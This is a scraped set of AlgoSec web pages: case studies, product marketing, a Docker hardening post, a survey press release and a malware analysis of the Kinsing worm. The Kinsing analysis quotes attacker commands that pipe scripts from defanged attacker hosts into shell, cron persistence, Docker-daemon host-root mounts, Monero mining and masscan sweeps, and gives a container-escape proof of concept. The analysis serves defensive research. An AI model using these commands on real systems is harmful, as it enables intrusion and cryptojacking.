

Search results
621 results found with an empty search
- Sanofi | AlgoSec
Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. SANOFI FINDS THE CURE FOR TIME-CONSUMING APPLICATION MIGRATION WITH ALGOSEC Organization Sanofi Industry Healthcare & Pharmaceuticals Headquarters Paris, France Download case study Share Customer success stories "Using AlgoSec during our data center migration allowed us to give technical project leaders access to all of the rules involved in the migration of their applications, which reduced the IT security team’s time on these projects by 80%. The application was very useful, simple to use and made everybody happy." AlgoSec Business Impact Simplify data center migration projects Reduce rule migration process time by 80% Streamline and improve firewall operations Background A multinational pharmaceutical company, Sanofi, has 112 industrial sites in 41 countries and operations in more than 100 countries. The company’s 110,000 employees are committed to protecting health, enhancing life, providing hope and responding to the potential healthcare needs of seven billion people around the world. Challenge The sensitive nature of Sanofi’s business and its wide ranging global operations require an extensive and well secured network, which currently has 120 firewalls all over the world. In the midst of a data center consolidation project, the company needed to understand how its security devices would be affected by application migrations. Sanofi was also eager to improve change management processes and gain key performance indicators (KPIs) for risk analysis.“Our main concern with the data center consolidation project was to enable various technical project leaders to see the different rules impacting the migration of their applications, and to avoid any outages. For that, we needed pre-migration and post-migration documentation on security,” says Bruno Roulleau, Network Security Architect at Sanofi. “We also needed metrics on the risk associated with different policies on the firewalls.” Solution When looking for a solution, Sanofi evaluated several vendors. “A key point for us was the ability to easily integrate the security devices in our current infrastructure, into the solution. We also wanted detailed reporting that would allow us to delegate policy management to project leaders,” Roulleau notes.Because Sanofi constantly upgrades its devices, its systems need to evolve and incorporate the new devices and rules seamlessly. “We chose the AlgoSec Security Management solution because its graphical interface is very user-friendly, it easily supports new devices and generates detailed reports and metrics on risks,” says Roulleau.Sanofi also appreciated AlgoSec’s flexibility. “AlgoSec is very open to developing new capabilities. We can ask to have some new features available by a certain date and they will deliver on time,” according to Roulleau. For a company with a complex network and rapidly evolving security needs, that responsiveness proved key to the decision to go with AlgoSec. Results Sanofi’s security team is now able to delegate responsibility for rule changes both during migration and on an ongoing basis. “Using AlgoSec during our data center migration allowed us to give technical project leaders access to all of the rules involved in the migration of their applications, which reduced the IT security team’s time on these projects by 80%. The application was very useful, simple to use and made everybody happy,” Roulleau says.Additionally, with AlgoSec’s reports Sanofi can now easily and clearly document the status of their firewalls as well as the impact of any changes on the network throughout the migration project. “We can now generate detailed reports in just three clicks!” Roulleau adds.Furthermore, AlgoSec’s optimization reports enabled Sanofi to clean up its security policies. Because they could clearly see all of the rules and their impact on network security, Roulleau’s team was able to safely eliminate unused and duplicate rules, which increased the efficiency of the firewalls. Those reports also provided insight into the risks associated with the current system and various changes being made. Schedule time with one of our experts
- Prevasio IaC security scanning | AlgoSec
Discover seamless IaC security scanning with AlgoSec s Prevasio Protect your cloud infrastructure effortlessly Learn more now Enhance DevOps with automated IaC security scanning Leverage a single tool and policy for seamless collaborationbetween developers and security teams Schedule a demo Schedule a demo Watch a video End-to-end cloud configuration management Leverage Prevasio's advanced capabilities to identify misconfigurations within your IaC templates . We support a range of compliance frameworks covering technologies such as Terraform and Kubernetes. End-to-end network security control management Consolidate and streamline network security controls, including security groups and Azure firewalls, into one centralized system. Easily manage multiple clouds, accounts, regions, and VPC/VNETs, to save time and minimize misconfigurations by handling similar security controls through a single security policy. End-to-end container lifecycle management Utilize Prevasio's mitigation rules including domain, country, CVE and open port coverage, to perform container image scanning during the build phase to block the inclusion of non-compliant images in the registry. Ensure compliance with continuous scanning. Get the latest insights from the experts cloud-security-prevasio-iac-security-scanning Read blog Bridging the DevSecOps Application Connectivity Disconnect via IaC Read blog Mitigating cloud security risks through comprehensive automated solutions Read blog Schedule time and secure your cloud Schedule time and secure your cloud Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- Global Transport | AlgoSec
Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Global Transport Company Moves Firewall Changes Faster Organization Global Transport Industry Transportation Headquarters International Download case study Share Customer success stories "Automation is definitely the way to go. We can now stay on top of the process even while we migrate our firewalls" Background A global transport and logistics company operates in nearly 100 countries and employs 50,000 people. From its 1000 offices, the company manages supply-chain solutions for thousands of customers all over the world each and every day. Found in virtually every industry, customers range from large international companies that require transportation services by sea and air to medium size business that ship mainly over the road. In addition, the company offers warehousing solutions on every continent to help customers with their logistics. Challenges Operating four major data centers on four continents, the security team’s daily tasks had become overwhelming. For the last several years, the company invested heavily in its rapidly growing IT and network security staff, but at its current size and level of activity, finding enough experienced staffers was practically impossible and too expensive to sustain. The only way forward was a network security automation solution that would: Automate many of the daily change requests across the 50+ firewalls, saving time so that IT and security staffers could work on other critical tasks Eliminate errors in firewall rules Demonstrate the ability to work with Cisco FirePower NGFW in the future The company also presented a special challenge in the form of its already-existing deployment of Cisco Bridge Virtual Interface (BVI) devices. The BVIs essentially act as Layer 2 firewalls. Since they, too, store firewall rules, they have to be included in the automation process. Solution The company brought in three leading Network Security Policy Management (NSPM) solutions to compete in a three-month proof-of-concept contest. The combination of AlgoSec Firewall Analyzer (AFA) and AlgoSec FireFlow (AFF) stood above the rest. AlgoSec Firewall Analyzer ensures security and compliance by providing visibility and analysis into complex network security policies. AlgoSec FireFlow improves security and saves security staffs’ time by automating the entire security policy change process, eliminating manual errors, and reducing risk. Results The two AlgoSec products, Firewall Analyzer and FireFlow went into production in mid-2018 where they have been working ever since, with the following results: Usability was outstanding—the products integrate well and are easy to learn and operate Single-pane-of-glass visibility across the network was suddenly available and useful to the network security staff The automation demonstrated the ability to slash the time required to push firewall changes and to eliminate errors The company found AlgoSec’s Tier 3 support to be impressive. Working directly with Tier 3 personnel and the ever-eager AlgoSec developers, the company’s Senior Technology Architect and other senior security analysts were able to work closely with AlgoSec to solve the BVI conundrum and implement the entire AlgoSec solution. Schedule time with one of our experts
- Improve Cybersecurity with Better Security Policy Change Management
Streamline Network Security Policy Changes, Minimize Errors, and Improve Efficiency with Effective Change Management Processes Improve Cybersecurity with Better Security Policy Change Management Yes, AlgoSec supports continuous compliance monitoring. As organizations adapt their security policies to meet emerging threats and address new vulnerabilities, they must constantly verify these changes against the compliance frameworks they subscribe to. Can AlgoSec be used for continuous compliance monitoring? Select a size Which network Get the latest insights from the experts Use these six best practices to simplify compliance and risk mitigation with the AlgoSec White paper Learn how AlgoSec can help you pass PCI-DSS Audits and ensure Solution overview See how this customer improved compliance readiness and risk Case study Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue
- Services | AlgoSec
Discover Algosec's expert services for optimizing network security, automating policies, reducing risks, and ensuring continuous compliance. Enterprise cybersecurity services Learn how our services benefit any corporate using a business-level firewall network AlgoSec professional services Learn more AlgoSec resident engineer Learn more AlgoSec designated support engineer Learn more AlgoSec support programs Learn more Training services and certification courses Learn more Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue
- Automated security policy management | AlgoSec FireFlow
Confidently automate your security policy change process with AlgoSec FireFlow from planning through risk analysis, implementation and validation Automated security policy management Leverage intelligent automation to confidently automate your security policy change process from planning through risk analysis, implementation, and validation. Schedule a demo Explore automation maturity Experience zero-touch change management Accelerate security policy changes while ensuring accuracy, saving time, and preventing errors – with zero-touch. Watch a video Speed up secure application deployment AppChange allows for changes at the business application level, including during application migrations, server deployment, and decommissioning. Learn more Save time by identifying devices that are in the way Automatically identify devices that are blocking connectivity flow, so you know what rules need to change. Download the Ebook Design smarter security policies Make existing rules and objects smarter to reduce complexity. Mitigate risk Make sure your changes don’t introduce risk, vulnerability, or compliance violations. Automatically analyze every proposed change before it’s implemented. Make changes exactly as intended Validate that changes were successfully and accurately applied and tickets not prematurely closed. Integrate with your existing processes Don’t change the way you work – use the tools you already know. Seamlessly integrate with your existing IT Service Management solution. End-to-end security management Intelligent automation is only one piece of a robust security policy. See how our full solution suite completes the picture. Firewall Analyzer See the whole picture Enable visibility across your hybrid network, optimize firewall rules, and prioritize risks. Firewall Analyzer solution AlgoSec Cloud Effortless cloud management Security management across the multi-cloud and multi-vendor estate AlgoSec Cloud solution AppViz Optimize the discovery of applications and services Leverage advanced AI to identify your business applications and their network connectivity accurately. AppViz solution Equip yourself with the technical details to discuss with your team and managers Ready for a deep dive? Contact us today Got everything you need? Here’s how you get started How to buy Download now Get the conversation started by sharing it with your team Solution brochure Browse now Take a deep breath. You’re about to dive deep! Cloud Security Watch the video "We cut the time it takes to implement firewall rules by at least 50%" What they say about us Placeholder Name Get the latest insights from the experts The 100x Revolution, learn how to Future-Proof your business applications with Secure Application Connectivity. Anywhere. Download the eBook Case Study- Nationwide Testimonial - AlgoSec Watch it now Product introduction video- Learn the key capabilities of the AlgoSec Secure application connectivity platform. Watch it now FireFlow automates the security change policy process from planning through deployment to production. FireFlow integrates with your existing with IT Service Management (ITSM) solutions, such as ServiceNow, BMC Remedy and HP for quick, accurate changes. What is FireFlow? Using FireFlow you can manage all inbound firewall rules to protect the network against incoming traffic, such as disallowed connections, malware, and denial-of-service (DoS) attacks and outbound firewall rules to protect against outgoing traffic, originating inside a network. How can I manage my firewall's inbound & outbound rules? FireFlow enables firewall security policy management through automated changes to firewall policies. FireFlow zero-touch change management integrates strategy, planning and design, implementing proactive risk analysis, validation and auditing to prevent errors and save time. How can I manage my firewall security policy? Firewall change requests are requests for a firewall configuration change which result in a change to the network security infrastructure. Firewall change requests must be monitored to prevent unintentional errors that violate compliance standards or increase vulnerabilities to the network. What are firewall change requests? Firewall policy rules determine what traffic your firewall allows and what is blocked. Firewall rules examine the control information in individual packets, and either block or allow them according to the criteria that you define. Firewall rules control how the firewalls protect your network from malicious programs and unauthorized access. What are firewall policy rules? When making changes to firewall rules, be aware of any potential security risks. Firewall rules should always be documented, with the creation and expiration date, the name of the person who added the rule and clarification of the rule’s purpose and what applications, services, devices, users and data it affects. What are the best practices for managing firewall policy rules? FAQ Schedule time and let's talk about intelligent automation Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue Schedule time and let's talk about intelligent automation
- AlgoSec | Best Practices for Docker Containers’ Security
Containers aren’t VMs. They’re a great lightweight deployment solution, but they’re only as secure as you make them. You need to keep... Cloud Security Best Practices for Docker Containers’ Security Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 7/27/20 Published Containers aren’t VMs. They’re a great lightweight deployment solution, but they’re only as secure as you make them. You need to keep them in processes with limited capabilities, granting them only what they need. A process that has unlimited power, or one that can escalate its way there, can do unlimited damage if it’s compromised. Sound security practices will reduce the consequences of security incidents. Don’t grant absolute power It may seem too obvious to say, but never run a container as root. If your application must have quasi-root privileges, you can place the account within a user namespace , making it the root for the container but not the host machine. Also, don’t use the –privileged flag unless there’s a compelling reason. It’s one thing if the container does direct I/O on an embedded system, but normal application software should never need it. Containers should run under an owner that has access to its own resources but not to other accounts. If a third-party image requires the –privileged flag without an obvious reason, there’s a good chance it’s badly designed if not malicious. Avoid running a Docker socket in a container. It gives the process access to the Docker daemon, which is a useful but dangerous power. It includes the ability to control other containers, images, and volumes. If this kind of capability is necessary, it’s better to go through a proper API. Grant privileges as needed Applying the principle of least privilege minimizes container risks. A good approach is to drop all capabilities using –cap-drop=all and then enabling the ones that are needed with –cap-add . Each capability expands the attack surface between the container and its environment. Many workloads don’t need any added capabilities at all. The no-new-privileges flag under security-opt is another way to protect against privilege escalation. Dropping all capabilities does the same thing, so you don’t need both. Limiting the system resources which a container guards not only against runaway processes but against container-based DoS attacks. Beware of dubious images When possible, use official Docker images. They’re well documented and tested for security issues, and images are available for many common situations. Be wary of backdoored images . Someone put 17 malicious container images on Docker Hub, and they were downloaded over 5 million times before being removed. Some of them engaged in cryptomining on their hosts, wasting many processor cycles while generating $90,000 in Monero for the images’ creator. Other images may leak confidential data to an outside server. Many containerized environments are undoubtedly still running them. You should treat Docker images with the same caution you’d treat code libraries, CMS plugins, and other supporting software, Use only code that comes from a trustworthy source and is delivered through a reputable channel. Other considerations It should go without saying, but you need to rebuild your images regularly. The libraries and dependencies that they use get security patches from time to time, and you need to make sure your containers have them applied. On Linux, you can gain additional protection from security profiles such as secomp and AppArmor . These modules, used with the security-opt settings, let you set policies that will be automatically enforced. Container security presents its distinctive challenges. Experience with traditional application security helps in many ways, but Docker requires an additional set of practices. Still, the basics apply as much as ever. Start with trusted code. Don’t give it the power to do more than it needs to do. Use the available OS and Docker features for enhancing security. Monitor your systems for anomalous behavior. If you take all these steps, you’ll ward off the large majority of threats to your Docker environment. Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- Algosecセキュリティマネジメントソリューション
Securely accelerate application delivery by automating application connectivity and security policy across the hybrid network estate. AlgoSecセキュリティマネジメントソリューション Bienvenue! クラウドセキュリティ制御およびオンプレミスファイアウォールのポリシー管理は、細心のバランスを要する作業です。一方でアタックサーフェスと呼ばれる外部脅威への露出を最小限に抑え、リスクを減らし、一方では重要なビジネス・アプリケーションへの接続を提供することで、生産性を向上させる必要があります。そして、ネットワークのセキュリティポリシーの管理プロセスは、常に複雑で、エラーが多く時間のかかるものでした。 しかし、今はもうその必要はありません。 AlgoSecはオンプレミスとクラウド上のネットワークセキュリティポリシーの管理を簡素化、自動化して、企業の俊敏性とセキュリティを強化し、常にコンプライアンスを遵守する環境を提供します。 セキュリティポリシーのライフサイクルマネジメントへ独自のアプローチ AlgoSecは、セキュリティポリシーのライフサイクル全体を管理し、ビジネスアプリケーションの継続的かつ安全な接続を確保するユニークなソリューションです。 アプリケーションのコネクティビティを自動的に検出し、リスクを事前に分析の上で、ネットワークセキュリティの変更を素早く実行、さらにファイアウォールルールを安全に削除することができます。 これらは、お客様のマルチベンダー環境での運用を調和し、自動的かつスムーズに行われます。 AlgoSecソリューションの利用例 クラウド環境とオンプレミス環境のネットワークセキュリティポリシー管理を統一 継続的にコンプライアンスを遵守し、ファイアウォール監査の準備にかかる時間とコストを大幅に削減 迅速かつ安全にアプリケーション接続を提供し、ネットワークのダウンタイムを防止 セキュリティ、ネットワーク、およびアプリケーションチーム間の連携で、DevSecOpsを促進 ファイアウォールの変更管理を自動化し、設定エラーを回避 適切なセキュリティ構成と効果的なネットワークセグメンテーションによりリスクを削減 AlgoSecセキュリティマネジメントソリューション ネットワークセキュリティポリシーの分析 より詳しい情報 Firewall Analyzer セキュリティポリシーの変更を自動化 より詳しい情報 FireFlow ROIを計算 AlgoSecホワイトペーパー コンタクト AlgoSec 日本担当 Email: [email protected] Relevant links TELEFÓNICA MÉXICO Estudio de caso NATURA Estudio de caso Schedule time with one of our experts
- AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers
We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an... Cloud Security Kinsing Punk: An Epic Escape From Docker Containers Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/22/20 Published We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it’s déjà vu all over again. Only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let’s start from its simplest trick — the credentials grabber. AWS Credentials Grabber If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface ( CLI ) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using AWS CLI programmatically. There is one little caveat, though. AWS CLI stores your credentials in a clear text file called ~/.aws/credentials . The documentation clearly explains that: The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory. That means, your cloud infrastructure is now as secure as your local computer. It was a matter of time for the bad guys to notice such low-hanging fruit, and use it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server. Hosting For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM , vulnerable to exploits. The attackers have compromised this server, installed a webshell b374k , and then uploaded several malicious files on it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236 , where the worm hosts its own body, is a vulnerable Docker host. According to Shodan , this server currently hosts a malicious Docker container image system_docker , which is spun with the following parameters: ./nigix –tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x –currency monero –httpd 8080 A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of alpine container image: chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh’ Docker Lan Pwner A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it’s important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring Docker daemon to listen for remote connections is easy. All it requires is one extra entry -H tcp://127.0.0.1:2375 in systemd unit file or daemon.json file. Once configured and restarted, the daemon will expose port 2375 for remote clients: $ sudo netstat -tulpn | grep dockerd tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd To attack other hosts, the malware collects network segments for all network interfaces with the help of ip route show command. For example, for an interface with an assigned IP 192.168.20.25 , the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24 . For each collected network segment, it launches masscan tool to probe each IP address from the specified segment, on the following ports: Port Number Service Name Description 2375 docker Docker REST API (plain text) 2376 docker-s Docker REST API (ssl) 2377 swarm RPC interface for Docker Swarm 4243 docker Old Docker REST API (plain text) 4244 docker-basic-auth Authentication for old Docker REST API The scan rate is set to 50,000 packets/second. For example, running masscan tool over the CIDR block 192.168.20.0/24 on port 2375 , may produce an output similar to: $ masscan 192.168.20.0/24 -p2375 –rate=50000 Discovered open port 2375/tcp on 192.168.20.25 From the output above, the malware selects a word at the 6th position, which is the detected IP address. Next, the worm runs zgrab — a banner grabber utility — to send an HTTP request “/v1.16/version” to the selected endpoint. For example, sending such request to a local instance of a Docker daemon results in the following response: Next, it applies grep utility to parse the contents returned by the banner grabber zgrab , making sure the returned JSON file contains either “ApiVersion” or “client version 1.16” string in it. The latest version if Docker daemon will have “ApiVersion” in its banner. Finally, it will apply jq — a command-line JSON processor — to parse the JSON file, extract “ip” field from it, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run Docker daemon, located in the same network segments as the victim. For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script: docker -H tcp://[IP_ADDRESS]:[PORT] run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “curl [MALICIOUS_SCRIPT] | bash; …” The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We’ll get down to this trick in a moment. For now, let’s break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters: –rm switch will cause Docker to automatically remove the container when it exits -v /:/mnt is a bind mount parameter that instructs Docker runtime to mount the host’s root directory / within the container as /mnt chroot /mnt will change the root directory for the current running process into /mnt , which corresponds to the root directory / of the host a malicious script to be downloaded and executed Escaping From the Docker Container The malicious script downloaded and executed within alpine container first checks if the user’s crontab — a special configuration file that specifies shell commands to run periodically on a given schedule — contains a string “129[.]211[.]98[.]236” : crontab -l | grep -e “129[.]211[.]98[.]236” | grep -v grep If it does not contain such string, the script will set up a new cron job with: echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1” ) | crontab – The code snippet above will suppress the no crontab for username message, and create a new scheduled task to be executed every minute . The scheduled task consists of 2 parts: to download and execute the malicious script and to delete all scheduled tasks from the crontab . This will effectively execute the scheduled task only once, with a one minute delay. After that, the container image quits. There are two important moments associated with this trick: as the Docker container’s root directory was mapped to the host’s root directory / , any task scheduled inside the container will be automatically scheduled in the host’s root crontab as Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in the root’s crontab , to be executed as root Building PoC To test this trick in action, let’s create a shell script that prints “123” into a file _123.txt located in the root directory / . echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1” ) | crontab – Next, let’s pass this script encoded in base64 format to the Docker daemon running on the local host: docker -H tcp://127.0.0.1:2375 run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “echo ‘[OUR_BASE_64_ENCODED_SCRIPT]’ | base64 -d | bash” Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers: $ docker -H tcp://127.0.0.1:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES An important question now is if the crontab job was created inside the (now destroyed) docker container or on the host? If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host: $ sudo crontab -l * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1 A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host: $ sudo crontab -l no crontab for root This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host. By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host! Malicious Script Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions: Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- Cloud Security Alliance Releases Latest Survey Report on State of Cloud Security Concerns, Challenges, and Incidents
Survey finds that 58% of respondents are concerned about security in the cloud, while misconfigurations are one of the leading causes of breaches and outages as public cloud adoption doubles over past two years Cloud Security Alliance Releases Latest Survey Report on State of Cloud Security Concerns, Challenges, and Incidents Survey finds that 58% of respondents are concerned about security in the cloud, while misconfigurations are one of the leading causes of breaches and outages as public cloud adoption doubles over past two years March 30, 2021 Speak to one of our experts SEATTLE – March 30, 2021 – The Cloud Security Alliance (CSA), the world’s leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment, and AlgoSec , a leading provider of business-driven network and cloud security management solutions, today announced the results of a new study titled, “ State of Cloud Security Concerns, Challenges, and Incidents .” The survey, which queried nearly 1,900 IT and security professionals from a variety of organization sizes and locations, sought to gain deeper insight into the complex cloud environment that continues to emerge and that has only grown more complex since the onset of the pandemic. The survey found that over half of organizations are running 41 percent or more of their workloads in public clouds, compared to just one-quarter in 2019. In 2021, 63 percent of respondents expect to be running 41 percent or more of their workloads in public cloud, indicating that adoption of public cloud will only continue. Sixty-two percent of respondents use more than one cloud provider, and the diversity of production workloads (e.g. container platforms, virtual machines) is also expected to increase. Key findings include: Security tops concerns with cloud projects : Respondents’ leading concerns over cloud adoption were network security (58%), a lack of cloud expertise (47%), migrating workloads to the cloud (44%), and insufficient staff to manage cloud environments (32%). It’s notable that a total of 79 percent of respondents reported staff-related issues, highlighting that organizations are struggling with handling cloud deployments and a largely remote workforce. Cloud issues and misconfigurations are leading causes of breaches and outages : Eleven percent of respondents reported a cloud security incident in the past year with the three most common causes being cloud provider issues (26%), security misconfigurations (22%), and attacks such as denial of service exploits (20%). When asked about the impact of their most disruptive cloud outages, 24 percent said it took up to 3 hours to restore operations, and for 26 percent it took more than half a day. Nearly one-third still manage cloud security manually : Fifty-two percent of respondents stated they use cloud-native tools to manage security as part of their application orchestration process, and 50 percent reported using orchestration and configuration management tools such as Ansible, Chef and Puppet. Twenty-nine percent said they use manual processes to manage cloud security. Who controls cloud security is not clear-cut : Thirty-five percent of respondents said their security operations team managed cloud security, followed by the cloud team (18%), and IT operations (16%). Other teams such as network operations, DevOps and application owners all fell below 10 percent, showing confusion over exactly who owns public cloud security. “The use of cloud services has continued to increase over the past decade. Particularly now, in the wake of the COVID-19 public health crisis. With organizations struggling to address a largely remote workforce, many enterprises’ digital transformations have been accelerated to enable employees to work from home,” said Hillary Baron, lead author and research analyst, Cloud Security Alliance. “As an ever-more complex cloud environment continues to evolve, the need for supplementary security tools to improve public cloud security will, as well.” “In the face of complex environments, a dearth of security staff, and an overall lack of cloud knowledge, organizations are turning to security tools that can help supplement their workforce. Three of the top four benefits organizations look for in security management tools involve proactive detection of risks and automation. These types of tools can supplement the challenges many organizations are experiencing with lack of expertise (47%) and staff (32%), as well as improve visibility as they move toward an ever-changing cloud environment,” said Jade Kahn, AlgoSec Chief Marketing Officer.AlgoSec commissioned the survey to add to the industry’s knowledge about hybrid-cloud and multi-cloud security. Sponsors of CSA research are CSA Corporate Members, who support the findings of the research project but have no added influence on content development nor editing rights. The report and its findings are vendor-agnostic and allow for global participation. Download the free eBook now. About Cloud Security Alliance The Cloud Security Alliance (CSA) is the world’s leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment. CSA harnesses the subject matter expertise of industry practitioners, associations, governments, and its corporate and individual members to offer cloud security-specific research, education, training, certification, events, and products. CSA’s activities, knowledge, and extensive network benefit the entire community impacted by cloud — from providers and customers to governments, entrepreneurs, and the assurance industry — and provide a forum through which different parties can work together to create and maintain a trusted cloud ecosystem. For further information, visit us at www.cloudsecurityalliance.org , and follow us on Twitter @cloudsa. About AlgoSec The leading provider of business-driven network security management solutions, AlgoSec helps the world’s largest organizations align security with their mission-critical business processes. With AlgoSec, users can discover, map and migrate business application connectivity, proactively analyze risk from the business perspective, tie cyber-attacks to business processes and intelligently automate network security changes with zero touch – across their cloud, SDN and on-premise networks. Over 1,800 enterprises, including 20 of the Fortune 50, have utilized AlgoSec’s solutions to make their organizations more agile, more secure and more compliant – all the time. Since 2005, AlgoSec has shown its commitment to customer satisfaction with the industry’s only money-back guarantee. www.algosec.com
- Hybrid & multi-cloud management tool | AlgoSec
Algosec Cloud automates cloud security policy management, providing visibility, risk mitigation, and compliance across hybrid environments. Secure your cloud with application-first security Gain complete network visibility. Simplify. Automate. Comply. Schedule a demo Watch a video Trusted by over 2,200 organizations since 2004 The cloud network security challenge Is your cloud network a maze of complexity? Hybrid and multi-cloud environments create a complex web of network security challenges. Fragmented visibility, manual processes, and evolving threats leave your organization vulnerable. Introducing AlgoSec Cloud Your Network Security Command Center. AlgoSec Cloud empowers you to take control of your network security posture with a single, unified platform. Gain unparalleled visibility, automate security tasks, and proactively address risks across your entire cloud ecosystem. Key Benefits Comprehensive Visibility: See every application, asset, configuration, and potential vulnerability across your on-premises and multi-cloud environments. Automation: Eliminate manual errors and streamline security operations with intelligent automation for network security policy management, change control, and compliance checks. Risk Mitigation: Proactively identify and prioritize network risks, and receive actionable recommendations for remediation. Compliance: Ensure continuous compliance with industry regulations and internal policies. Operational Efficiency: Foster collaboration across teams and free up resources to focus on innovation, not just firefighting. Experience the power of unified cloud network security and compliance. Use Cases: Transforming Network Security Real-World Solutions for Real-World Challenges: Simplify Network Application Security Management Accelerate Cloud Adoption Respond to Security Incidents Faster Optimize Network Security & Costs End-to-end security management Application discovery and visibility is only one piece of a robust security policy.See how our full solution suite completes the picture Firewall Analyzer Security policy you can see Enable visibility across your hybrid network, optimize firewall rules, and prioritize risks Firewall Analyzer solution FireFlow Automate and secure policy changes Process security changes in a fraction of the time by automating the entire security policy change process. FireFlow solution AlgoSec AppViz Clear application visibility Application discovery and connectivity management AlgoSec AppViz solution Equip yourself with the technical details to discuss with your team and managers Ready for a deep dive? Learn more Got everything you need? Here’s how you get started How to buy Learn more Get the conversation started by sharing it with your team Solution brochure Learn more Here's how we secure our SaaS solution Cloud Security Watch the video "With AlgoSec, I am able to get requests completed within minutes" What they say about us IT Director Get the latest insights from the experts 6 best practices to stay secure in the hybrid cloud Read eBook NCR Corporation's Network Security Transformation with AlgoSec Watch it now AlgoSec cloud product demo Watch it now Schedule time to manage your application connectivity in the cloud Schedule time to manage your application connectivity in the cloud Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue